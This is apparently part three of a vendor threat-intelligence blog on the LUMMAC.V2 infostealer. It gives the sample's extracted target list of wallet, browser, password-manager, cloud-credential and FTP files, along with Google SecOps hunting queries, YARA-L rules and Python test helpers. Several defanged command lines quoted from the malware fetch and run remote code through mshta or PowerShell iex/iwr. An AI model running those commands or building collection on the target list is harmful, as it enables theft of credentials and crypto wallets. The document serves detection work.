
Having dissected the network communication, data staging, and exfiltration techniques employed by LUMMAC.V2 in Part 2, we now turn to Part 3: the configuration extracted from a sample, followed by hunting queries and detection rules for Google SecOps.

 

Extracted configuration data

 

This configuration was extracted from the LUMMAC.V2 sample with SHA-256 9b5261901aab3f45a0381d39b0f535853fdcae74c7f25121efda70bb89b062e2 (https://www.virustotal.com/gui/file/9b5261901aab3f45a0381d39b0f535853fdcae74c7f25121efda70bb89b062e2/detection). Each row gives the directory searched (Path, using Windows environment variables), the filename masks collected (Masks), the folder under which the files are stored in the exfiltration archive (Zip Path), the search Depth, and the per-file size limit in bytes (20971520 bytes is 20 MiB). The browser entries carry only a path and an archive folder name.

| Path | Masks | Zip Path | Depth | File Size Limit (bytes) |
|---|---|---|---|---|
| %appdata%\Ethereum | keystore | Wallets/Ethereum | 1 | 20971520 |
| %appdata%\Exodus\exodus.wallet | * | Wallets/Exodus | 2 | 20971520 |
| %appdata%\Ledger Live | * | Wallets/Ledger Live | 2 | 20971520 |
| %appdata%\atomic\Local Storage\leveldb | * | Wallets/Atomic | 2 | 20971520 |
| %localappdata%\Coinomi\Coinomi\wallets | * | Wallets/Coinomi | 2 | 20971520 |
| %appdata%\Authy Desktop\Local Storage\leveldb | * | Wallets/Authy Desktop | 2 | 20971520 |
| %appdata%\Bitcoin\wallets | * | Wallets/Bitcoin core | 2 | 20971520 |
| %appdata%\Binance | app-store.json, .finger-print.fp, simple-storage.json, window-state.json | Wallets/Binance | 1 | 20971520 |
| %appdata%\com.liberty.jaxx\IndexedDB | * | Wallets/JAXX New Version | 2 | 20971520 |
| %appdata%\Electrum\wallets | * | Wallets/Electrum | 0 | 20971520 |
| %appdata%\Electrum-LTC\wallets | * | Wallets/Electrum-LTC | 0 | 20971520 |
| %appdata%\ElectronCash\wallets | * | Wallets/ElectronCash | 0 | 20971520 |
| %appdata%\Guarda\IndexedDB | * | Wallets/Guarda | 2 | 20971520 |
| %appdata%\DashCore\wallets | *.dat | Wallets/DashCore | 1 | 20971520 |
| %appdata%\WalletWasabi\Client\Wallets | * | Wallets/Wasabi | 0 | 20971520 |
| %appdata%\Daedalus Mainnet\wallets | she.*.sqlite | Wallets/Daedalus | 0 | 20971520 |
| %localappdata%\Google\Chrome\User Data | | Chrome | | |
| %localappdata%\Google\Chrome Beta\User Data | | Chrome Beta | | |
| %appdata%\Opera Software\Opera Stable | | Opera | | |
| %localappdata%\Opera Software\Opera Neon\User Data | | Opera Neon | | |
| %appdata%\Opera Software\Opera GX Stable | | Opera GX Stable | | |
| %localappdata%\Microsoft\Edge\User Data | | Edge | | |
| %localappdata%\BraveSoftware\Brave-Browser\User Data | | Brave | | |
| %localappdata%\Epic Privacy Browser\User Data | | EpicPrivacyBrowser | | |
| %localappdata%\Vivaldi\User Data | | Vivaldi | | |
| %localappdata%\Maxthon\User Data | | Maxthon | | |
| %localappdata%\Iridium\User Data | | Iridium | | |
| %localappdata%\AVG\Browser\User Data | | AVG Secure Browser | | |
| %localappdata%\Tencent\QQBrowser\User Data | | QQBrowser | | |
| %localappdata%\360Browser\Browser\User Data | | 360Browser | | |
| %localappdata%\SuperBrowser\User Data\BrowserWorkbench_1 | | ZiNiao Browser | | |
| %localappdata%\CentBrowser\User Data | | CentBrowser | | |
| %localappdata%\Chedot\User Data | | Chedot | | |
| %localappdata%\CocCoc\Browser\User Data | | CocCoc | | |
| %appdata%\Mozilla\Firefox\Profiles | | Mozilla Firefox | | |
| %appdata%\Waterfox\Profiles | | Waterfox | | |
| %appdata%\Moonchild Productions\Pale Moon\Profiles | | Pale Moon | | |
| %userprofile% | *.kbdx | Applications/KeePass | 2 | 20971520 |
| %localappdata%\1Password | .sqlite | Applications/1Password | 0 | 20971520 |
| %appdata%\Bitwarden | data.json | Applications/Bitwarden | 0 | 20971520 |
| %appdata%\NordPass | nordpass*.json, nordpass*.sqlite | Applications/NordPass | 0 | 20971520 |
| %userprofile% | seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt | Important Files/Profile | 3 | 20971520 |
| %userprofile%\Desktop | *.txt | Important Files/Desktop | 2 | 20971520 |
| %appdata%\Telegram Desktop | *s | Applications/Telegram | 3 | 20971520 |
| %programfiles%\Telegram Desktop | *s | Applications/Telegram | 3 | 20971520 |
| %programfiles(x86)%\Telegram Desktop | *s | Applications/Telegram | 3 | 20971520 |
| %appdata%\FileZilla | recentservers.xml, sitemanager.xml | Applications/FileZilla | 2 | 20971520 |
| %userprofile% | site.xml | Applications/AnyClient | 0 | 20971520 |
| %programdata%\SiteDesigner\3D-FTP | sites.ini | Applications/3D-FTP | 0 | 20971520 |
| %appdata%\SmartFTP\Client 2.0\Favorites | * | Applications/SmartFTP | 1 | 20971520 |
| %appdata%\FTPGetter | servers.xml | Applications/FTPGetter | 0 | 20971520 |
| %appdata%\FTPbox | profiles.conf | Applications/FTPbox | 0 | 20971520 |
| %appdata%\FTPInfo | ServerList.xml | Applications/FTPInfo | 0 | 20971520 |
| %appdata%\FTPRush | RushSite.xml | Applications/FTPRush | 0 | 20971520 |
| %programfiles(x86)%\FTP Commander Deluxe | FTPLIST.TXT | Applications/FTP Commander Deluxe | 0 | 20971520 |
| %localappdata%\DeskShare Data\FTP Manager Lite | FTPManagerLiteSettings.db | Applications/FTP Manager Lite | 1 | 20971520 |
| %localappdata%\DeskShare Data\Auto FTP Manager | AutoFTPManagerSettings.db | Applications/Auto FTP Manager | 1 | 20971520 |
| %userprofile%\.azure | * | Applications/Azure | 1 | 20971520 |
| %userprofile%\.aws | * | Applications/Azure | 1 | 20971520 |
| %localappdata%\.IdentityService | msal.cache, msalv2.cache | Applications/Azure | 0 | 20971520 |
| %localappdata%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState | plum.sqlite-wal | Notes | 0 | 20971520 |
| %appdata%\Conceptworld\Notezilla | Notes9.db | Notes/Notezilla | 0 | 20971520 |

Table 3: File Paths and Configurations
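To make the columns of Table 3 concrete, the following is an added example written for this edit (not code from the page, from Mandiant, or from the malware) that evaluates a few rows of the table against a constructed directory tree: it expands the environment variables from an explicit mapping, applies the comma-separated masks case-insensitively as NTFS would, enforces the file size limit, and treats Depth as the number of subdirectory levels searched below Path, which is an assumption because the page does not define the column. Pointed at a mounted image of a compromised profile, the same function gives an incident responder a quick list of what an infection with this configuration could have collected.

```python
import fnmatch
import os
import tempfile

# Rows copied from Table 3: (path, masks, zip path, depth, file size limit in bytes).
CONFIG = [
    (r"%appdata%\Bitcoin\wallets", "*", "Wallets/Bitcoin core", 2, 20971520),
    (r"%appdata%\DashCore\wallets", "*.dat", "Wallets/DashCore", 1, 20971520),
    (r"%appdata%\Electrum\wallets", "*", "Wallets/Electrum", 0, 20971520),
    (r"%userprofile%", "seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, "
                       "bitcoin.txt, words, wallet.txt", "Important Files/Profile", 3, 20971520),
    (r"%appdata%\FileZilla", "recentservers.xml, sitemanager.xml", "Applications/FileZilla", 2, 20971520),
]

# Constructed directory tree standing in for a victim profile (no real data).
SAMPLE_FILES = [
    ("AppData/Roaming/Bitcoin/wallets/wallet.dat", 64),
    ("AppData/Roaming/Bitcoin/wallets/a/b/c/old.dat", 64),      # three levels down, Depth is 2
    ("AppData/Roaming/DashCore/wallets/w1/wallet.dat", 64),
    ("AppData/Roaming/DashCore/wallets/notes.txt", 64),         # fails the *.dat mask
    ("AppData/Roaming/Electrum/wallets/default_wallet", 64),
    ("AppData/Roaming/Electrum/wallets/old/backup", 64),        # Depth 0: subdirectories skipped
    ("AppData/Roaming/FileZilla/sitemanager.xml", 64),
    ("seed.txt", 64),
    ("Documents/Crypto/Seed.TXT", 64),                          # masks compare case-insensitively
    ("Desktop/backup/wallet.txt", 20971520 + 1),                # one byte over the size limit
]


def expand_path(path, env):
    """Substitute %var% tokens from an explicit mapping (not os.environ) and
    convert Windows separators, so the walk can target a mounted image or a
    test tree on any OS."""
    for name, value in env.items():
        path = path.replace("%" + name + "%", value)
    return path.replace("\\", os.sep)


def matches_mask(filename, masks):
    """Masks are comma-separated globs; compare case-insensitively as NTFS does."""
    return any(fnmatch.fnmatchcase(filename.lower(), m.strip().lower())
               for m in masks.split(","))


def collect(config, env):
    """Return {archive_name: host_path} for every file the rows would pick up.
    Assumption (the page does not define the column): Depth is the number of
    subdirectory levels below Path that are searched, so 0 means Path only."""
    found = {}
    for path, masks, zip_path, depth, size_limit in config:
        root = expand_path(path, env)
        if not os.path.isdir(root):
            continue
        for dirpath, dirnames, filenames in os.walk(root):
            rel = os.path.relpath(dirpath, root)
            level = 0 if rel == "." else rel.count(os.sep) + 1
            if level >= depth:
                dirnames[:] = []          # stop os.walk from descending further
            for name in filenames:
                full = os.path.join(dirpath, name)
                if not matches_mask(name, masks) or os.path.getsize(full) > size_limit:
                    continue
                inside = name if rel == "." else os.path.join(rel, name)
                found[zip_path + "/" + inside.replace(os.sep, "/")] = full
    return found


def demo():
    """Build the constructed tree in a temp dir, run the rows over it, return archive names."""
    with tempfile.TemporaryDirectory() as base:
        for rel, size in SAMPLE_FILES:
            full = os.path.join(base, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.truncate(size)         # sparse file: records the size without writing 20 MiB
        env = {"userprofile": base, "appdata": os.path.join(base, "AppData", "Roaming")}
        return sorted(collect(CONFIG, env))


if __name__ == "__main__":
    for archive_name in demo():
        print(archive_name)
```

Six of the ten constructed files survive the masks, the depth limit and the size limit; the archive names show why the Zip Path column matters for triage, since the exfiltrated archive layout mirrors it rather than the original host paths.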

 

Threat Hunting & Detection in Google SecOps

 

Hunting Opportunities

 

Mandiant Threat Defense surfaces otherwise undetected malicious activity with a detection strategy that correlates both strong signals (alerts) and weak signals (security-relevant events that are not inherently malicious) to uncover evidence of attacker activity. These signals are used to classify and distil petabytes of telemetry into enriched, highly curated cases for analyst review.

 

Google SecOps customers can use the following UDM search queries (YARA-L 2.0 syntax) to hunt for the distribution and execution of infostealers like LUMMAC.V2, and of other malware using similar tactics, on events normalized to UDM. These queries rely on Windows process activity logs, which can be sourced from Windows Event Logs and/or Endpoint Detection and Response (EDR) telemetry.

  • Microsoft HTML Application Host executing a remotely-hosted file - Distribution campaigns leading to LUMMAC.V2 and other malware have been observed tricking users into running mshta.exe with a URL, which fetches the file and executes its contents. Use the following query to hunt for such activity in Google SecOps. There may be legitimate uses of mshta.exe in your environment; tune these out by adding exclusions and re-running the query, or by using the Hide or Pivot functionality on the query results. The URL pattern must allow for the optional "s", since most of the observed downloads use HTTPS.
metadata.event_type = "PROCESS_LAUNCH" AND
(
  (
  principal.process.file.full_path = /mshta/ nocase AND
  principal.process.command_line = /https?:\/\// nocase
  ) OR
  (
  target.process.file.full_path = /mshta/ nocase AND
  target.process.command_line = /https?:\/\// nocase
  )
) AND
not target.process.command_line = /<your exclusions here>/ nocase

These events map to MITRE ATT&CK Technique T1218.005 - System Binary Proxy Execution: Mshta. Examples of commands that download LUMMAC.V2 are shown below. Note the Greek lowercase letters omicron and tau in "rοbοτ" in place of the Latin o and t: the text looks the same to the victim but will not match detection logic that looks for the literal string "robot".

  • "C:\WINDOWS\system32\mshta.exe" hxxps://axilec[.]shop/<random name>.mp3 # I am not a rοbοτ: CΑPΤCΗΑ Vеrіficατιοn ID: <numbers>
  • "mshta.exe" hxxps://cdn5-dispatcher-mp.oss-ap-northeast-2.aliyuncs[.]com/<random name>.mp3 # UІD: <numbers> – Ι аm not а roƄot – Vеrіfу СΑРΤСНА ѕеquеnсе

 

  • Downloading file using Invoke-Expression and Invoke-WebRequest cmdlets - Mandiant has observed LUMMAC.V2 distribution campaigns designed to trick users into executing PowerShell cmdlets that download second-stage malware components. Use the following query to hunt for PowerShell command lines that contain the iex and iwr aliases together with a URL, either in clear text or Base64-encoded. The second block matches the UTF-16LE Base64 that -EncodedCommand produces (aQBlAHgA decodes to iex), and the third matches UTF-8 Base64 as used with [Convert]::FromBase64String (aWV4 decodes to iex). A Base64 fragment only matches when the keyword sits at the same byte alignment as in the samples it was derived from, so the encoded branches are narrower than the clear-text one:
metadata.event_type = "PROCESS_LAUNCH" AND
(
  (
  target.process.command_line = /iex/ nocase AND
  target.process.command_line = /iwr/ nocase AND
  target.process.command_line = /http/ nocase
  ) OR
  (
  target.process.command_line = /aQBlAHgA/ AND
  target.process.command_line = /AGkAdwByAC/ AND
  target.process.command_line = /aAB0AHQAcAA/
  ) OR
  (
  target.process.command_line = /aWV4/ AND
  target.process.command_line = /aXdy/ AND
  target.process.command_line = /aHR0cA/
  )
)

These events map to MITRE ATT&CK Technique T1105 - Ingress Tool Transfer and MITRE ATT&CK Technique T1059.001 - Command and Scripting Interpreter: PowerShell. Base64-decoded commands which download LUMMAC.V2 are shown below.

  • iex (iwr http://<IP address>:5001/get_txt -UseBasicPARSING).Content
  • iwr https://<Malicious.domain>/w/str.txt -UseBasicParsing|iex ## Verification ID 389234 
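The Base64 branches of the query above deserve a closer look, because a Base64 fragment of a keyword only appears in the encoded string when the keyword starts at the same offset within a 3-byte group as it did when the fragment was derived. The following added example, written for this edit and not taken from the page or from Mandiant's tooling, derives the fragments for all three alignments in both UTF-16LE (the -EncodedCommand form) and UTF-8, drops fragments too short to be meaningful, and pairs the fragment check with a decode-first check that does not depend on alignment at all. The command line, the TEST-NET IP address and the surrounding PowerShell syntax are constructed.

```python
import base64
import re

TOKENS = ("iex", "iwr", "http")   # the three keywords the hunt query chains together


def b64_fragments(token, encoding, min_len=4):
    """Base64 fragments that appear wherever `token` occurs inside a longer
    encoded buffer, one per byte alignment (offset 0, 1 or 2 in a 3-byte group).
    Only characters determined entirely by the token's own bytes are kept, and
    fragments shorter than min_len are dropped because they match too easily."""
    raw = token.encode(encoding)
    fragments = set()
    for offset in range(3):
        tail = (-(offset + len(raw))) % 3                   # pad to a multiple of 3 bytes
        enc = base64.b64encode(b"\0" * offset + raw + b"\0" * tail).decode("ascii")
        start = -(-(8 * offset) // 6)                       # first char wholly inside raw
        end = (8 * (offset + len(raw))) // 6                # one past the last such char
        if end - start >= min_len:
            fragments.add(enc[start:end])
    return fragments


UTF16_FRAGMENTS = {t: b64_fragments(t, "utf-16-le") for t in TOKENS}   # -EncodedCommand form
UTF8_FRAGMENTS = {t: b64_fragments(t, "utf-8") for t in TOKENS}        # FromBase64String form
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def plain_hit(text):
    """Branch 1 of the hunt: all three keywords in clear text (PowerShell ignores case)."""
    low = text.lower()
    return all(t in low for t in TOKENS)


def fragment_hit(cmdline, table):
    """Branches 2 and 3: some fragment of every keyword occurs in the raw command line."""
    return all(any(f in cmdline for f in table[t]) for t in TOKENS)


def decoded_blobs(cmdline):
    """Decode every Base64-looking run as both UTF-16LE and UTF-8. Garbage from
    the wrong decoding is harmless because plain_hit needs all three keywords."""
    for m in _B64_BLOB.finditer(cmdline):
        blob = m.group(0)
        try:
            data = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except ValueError:
            continue
        for enc in ("utf-16-le", "utf-8"):
            yield data.decode(enc, errors="ignore")


def is_suspicious(cmdline):
    """Decode first; fall back to fragment matching for blobs that do not decode."""
    return (plain_hit(cmdline)
            or any(plain_hit(d) for d in decoded_blobs(cmdline))
            or fragment_hit(cmdline, UTF16_FRAGMENTS)
            or fragment_hit(cmdline, UTF8_FRAGMENTS))


def b64(text, encoding):
    """Encode text as an -EncodedCommand (UTF-16LE) or FromBase64String (UTF-8) argument."""
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed command line (TEST-NET address) shaped like the first decoded example above.
SAMPLE = "iex (iwr http://192.0.2.10:5001/get_txt -UseBasicParsing).Content"

if __name__ == "__main__":
    for name, table in (("UTF-16LE", UTF16_FRAGMENTS), ("UTF-8", UTF8_FRAGMENTS)):
        print(name, {t: sorted(table[t]) for t in TOKENS})
    print(is_suspicious("powershell -nop -w hidden -enc " + b64(SAMPLE, "utf-16-le")))
```

Two points fall out of running it. In UTF-16LE every alignment of every keyword leaves a fragment of at least seven characters, so a single shift of the command text does not evade the fragment check. In UTF-8 the three-byte keywords iex and iwr leave a usable fragment at only one of the three alignments, which is why the constructed command, where iwr starts at byte 5, is missed by the fragment branch and caught only by decoding. When the log source lets you decode the argument, do that rather than extending the fragment list.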

 

  • Concatenating multiple files using the Windows Command Prompt - LUMMAC.V2 reconstructs malicious files on the host by concatenating separately written fragments with the copy /b command.

Since concatenating files in this manner is likely rare in your environment, use the UDM query below in Google SecOps to identify instances of this activity:

metadata.event_type = "PROCESS_LAUNCH" AND
target.process.command_line = /cmd\s+\/c/ nocase AND
target.process.command_line = /copy\s+\/b.+\+.+\+/ nocase

These events map to MITRE ATT&CK Technique T1059.003 - Command and Scripting Interpreter: Windows Command Shell. Examples of LUMMAC.V2 commands which concatenate randomly-named files are shown below.

  • cmd /c copy /b 113404\Opened.com + Merger + Progressive + Preference + Illustrations + Milk + Utility + Her + Review + Polish + Bra + Snapshot 113404\Opened.com
  • cmd /c copy /b ..\Shadow + ..\Finnish + ..\Ambien + ..\Reached + ..\Dana + ..\Worth + ..\Access + ..\Vocals + ..\Clocks + ..\Aluminium + ..\Tries + ..\Calm + ..\Unlike s

 

  • PowerShell launching a process located in the AppData\Roaming directory - When malicious files must be written to disk, threat actors often leverage Windows locations like AppData\Roaming, AppData\Local, and AppData\LocalLow as administrator privileges are not required to write to these locations. The PowerShell execution events map to MITRE ATT&CK Technique T1059.001 - Command and Scripting Interpreter: PowerShell.

Use the UDM query below in Google SecOps to identify PowerShell launching processes in AppData\Roaming:

metadata.event_type = "PROCESS_LAUNCH" AND
principal.process.file.full_path = /powershell|pwsh/ nocase AND
target.process.file.full_path = /appdata\\roaming/ nocase AND
target.process.command_line = /\\AppData\\Roaming(\\[^\\\/]+){0,}\\[^\\\/]+\.exe"?\s*$/ nocase

 

An example of such an event from a LUMMAC.V2 compromise is PowerShell executing C:\Users\<user>\AppData\Roaming\<Randomly-named subfolder>\MyDockFinder.exe on a host, as described above in the “Variation 2: Process Hollowing” section. 

  • PowerShell creating registry Run key persistence for binary in AppData - Malware can leverage registry Run keys for persistence, with the registry value data pointing to a binary in directory locations commonly used by threat actors for staging files. These events map to MITRE ATT&CK Technique T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder.

 

Use the UDM query below in Google SecOps to identify such events:

metadata.event_type = "REGISTRY_CREATION" AND
principal.process.file.full_path = /powershell|pwsh/ nocase AND
target.registry.registry_key = /Software\\Microsoft\\Windows\\CurrentVersion\\Run/ nocase AND
target.registry.registry_value_data = /\\AppData\\Roaming(\\[^\\\/]+){0,}\\[^\\\/]+\.exe/ nocase
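The following is an added example, written for this edit rather than taken from the page or from Mandiant, that expresses the mshta, copy /b, AppData\Roaming launch and Run key hunts above as Python predicates and runs them over a handful of constructed process and registry events. It is a way to exercise the regexes against an EDR export before committing them to a SecOps search. The event schema, hostnames, user, domain and folder names are invented; the copy /b command line is the first of the two examples quoted above, and the mshta command line reuses the Greek-letter "rοbοτ" trick to show that the URL pattern is unaffected by it.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal UDM-like event; fields mirror the UDM paths used in the hunts."""
    event_type: str
    principal_path: str = ""       # principal.process.file.full_path
    principal_cmd: str = ""        # principal.process.command_line
    target_path: str = ""          # target.process.file.full_path
    target_cmd: str = ""           # target.process.command_line
    registry_key: str = ""         # target.registry.registry_key
    registry_value_data: str = ""  # target.registry.registry_value_data


NOCASE = re.IGNORECASE
URL = re.compile(r"https?://", NOCASE)
POWERSHELL = re.compile(r"powershell|pwsh", NOCASE)
RUN_KEY = re.compile(r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", NOCASE)
# \AppData\Roaming, zero or more subfolders, then <name>.exe; the launch variant also wants end of line
ROAMING_EXE = re.compile(r"\\AppData\\Roaming(\\[^\\/]+)*\\[^\\/]+\.exe", NOCASE)
ROAMING_EXE_EOL = re.compile(r"\\AppData\\Roaming(\\[^\\/]+)*\\[^\\/]+\.exe\"?\s*$", NOCASE)


def mshta_remote(e):
    return e.event_type == "PROCESS_LAUNCH" and bool(
        (re.search("mshta", e.principal_path, NOCASE) and URL.search(e.principal_cmd))
        or (re.search("mshta", e.target_path, NOCASE) and URL.search(e.target_cmd)))


def copy_concat(e):
    return e.event_type == "PROCESS_LAUNCH" and bool(
        re.search(r"cmd\s+/c", e.target_cmd, NOCASE)
        and re.search(r"copy\s+/b.+\+.+\+", e.target_cmd, NOCASE))


def ps_launch_from_roaming(e):
    return e.event_type == "PROCESS_LAUNCH" and bool(
        POWERSHELL.search(e.principal_path)
        and re.search(r"appdata\\roaming", e.target_path, NOCASE)
        and ROAMING_EXE_EOL.search(e.target_cmd))


def ps_run_key_to_roaming(e):
    return e.event_type == "REGISTRY_CREATION" and bool(
        POWERSHELL.search(e.principal_path)
        and RUN_KEY.search(e.registry_key)
        and ROAMING_EXE.search(e.registry_value_data))


HUNTS = {f.__name__: f for f in (mshta_remote, copy_concat, ps_launch_from_roaming, ps_run_key_to_roaming)}


def run_hunts(events):
    """Return {hunt name: [indexes of matching events]}."""
    return {name: [i for i, e in enumerate(events) if pred(e)] for name, pred in HUNTS.items()}


# Constructed events: paths, user, domain and the Qmz4 folder name are invented.
EVENTS = [
    Event("PROCESS_LAUNCH", principal_path=r"C:\Windows\explorer.exe",
          target_path=r"C:\Windows\System32\mshta.exe",
          target_cmd=r'"C:\WINDOWS\system32\mshta.exe" https://cdn.example.invalid/k3.mp3 # I am not a rοbοτ'),
    Event("PROCESS_LAUNCH", principal_path=r"C:\Windows\System32\cmd.exe",
          target_path=r"C:\Windows\System32\cmd.exe",
          target_cmd=r"cmd /c copy /b 113404\Opened.com + Merger + Progressive + Preference + Illustrations + Milk + Utility + Her + Review + Polish + Bra + Snapshot 113404\Opened.com"),
    Event("PROCESS_LAUNCH", principal_path=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          target_path=r"C:\Users\alice\AppData\Roaming\Qmz4\sample.exe",
          target_cmd=r'"C:\Users\alice\AppData\Roaming\Qmz4\sample.exe"'),
    Event("REGISTRY_CREATION", principal_path=r"C:\Program Files\PowerShell\7\pwsh.exe",
          registry_key=r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
          registry_value_data=r"C:\Users\alice\AppData\Roaming\Qmz4\sample.exe"),
    Event("PROCESS_LAUNCH", principal_path=r"C:\Windows\explorer.exe",          # benign: local .hta, no URL
          target_path=r"C:\Windows\System32\mshta.exe",
          target_cmd=r'"C:\Windows\System32\mshta.exe" C:\Tools\inventory.hta'),
]

if __name__ == "__main__":
    for name, hits in run_hunts(EVENTS).items():
        print(f"{name}: {hits}")
```

Each predicate fires on exactly one constructed event and the benign local-.hta launch matches nothing, which is the behaviour the exclusions in the SecOps queries are meant to preserve.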

 

Detections

 

Users can create custom single-event or multi-event YARA-L 2.0 rules in Google SecOps to detect LUMMAC.V2 malware activity. Both rules below are hunt-type rules (type = "hunt"): they surface candidates for analyst review rather than confirmed compromises.

  • This rule detects potential process hollowing of the BitLockerToGo.exe binary: BitLockerToGo.exe launched by a parent other than explorer.exe whose own parent process runs from AppData\Roaming.
rule BITLOCKERTOGO_PROCESS_EXECUTION_METHODOLOGY {
    meta:
        author = "Mandiant"
        description = "This rule is designed to detect the execution of the BitLockerToGo.exe process on the host. While this process can be used for legitimate purposes, malware families like LUMMAC have previously used it as a target for process hollowing. This is associated with MITRE ATT&CK (r) Tactic(s): Defense Evasion, Privilege Escalation and Technique(s): T1218, T1055.012"
        mitre_technique_name = "System Binary Proxy Execution"
        mitre_technique = "T1218"
        mitre_tactic_name = "Defense Evasion"
        platform = "Windows"
        severity = "High"
        purpose = "Mission to identify threat actor abuse of trusted operating system tools/binaries to execute malicious code"
        type = "hunt"
    events:
        $e.metadata.event_type = "PROCESS_LAUNCH"
        (
            re.regex($e.target.process.command_line, `(\\|")BitLockerToGo\.exe`) nocase or
            re.regex($e.target.process.file.full_path, `BitLockerToGo\.exe`) nocase
        )
        not $e.principal.process.file.full_path = /(^|\\)explorer.exe$/ nocase
        re.regex($e.principal.process.parent_process.file.full_path, `\\AppData\\Roaming\\`) nocase
    outcome:
        $hostname = $e.principal.hostname
    condition:
        $e
}
  • This rule detects a process whose image path ends in a .pif extension making network connections, DNS lookups or HTTP requests.
rule PROCESS_WITH_PIF_EXTENSION_NETWORK_CONNECTIONS_METHODOLOGY {
    meta:
        author = "Mandiant"
        description = "This rule is designed to detect when a process with a .PIF (Program Information Files on Microsoft Windows computers) file extension spawns network events. This technique has been linked to malware compromises involving Infostealer. Determine if the observed process and network traffic are malicious."
        mitre_technique_name = "Application Layer Protocol"
        mitre_technique = "T1071.001"
        mitre_tactic_name = "Command And Control"
        platform = "Windows"
        severity = "Critical"
        purpose = "Mission to identify threat actors establishing command and control using web protocols"
        type = "hunt"
    events:
        (
            $e.metadata.event_type = "NETWORK_CONNECTION" or
            $e.metadata.event_type = "NETWORK_DNS" or
            $e.metadata.event_type = "NETWORK_HTTP"
        ) and
        re.regex($e.principal.process.file.full_path, `\.pif$`) nocase
    outcome:
        $hostname = $e.principal.hostname
    condition:
        $e
}

I would like to extend my thanks to Tina Johnson and Mustafa Nasser from the Mandiant FLARE Team and all the reviewers for their valuable contributions to this blog post.

Other entries in Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations

Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations Part 1

Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations Part 2
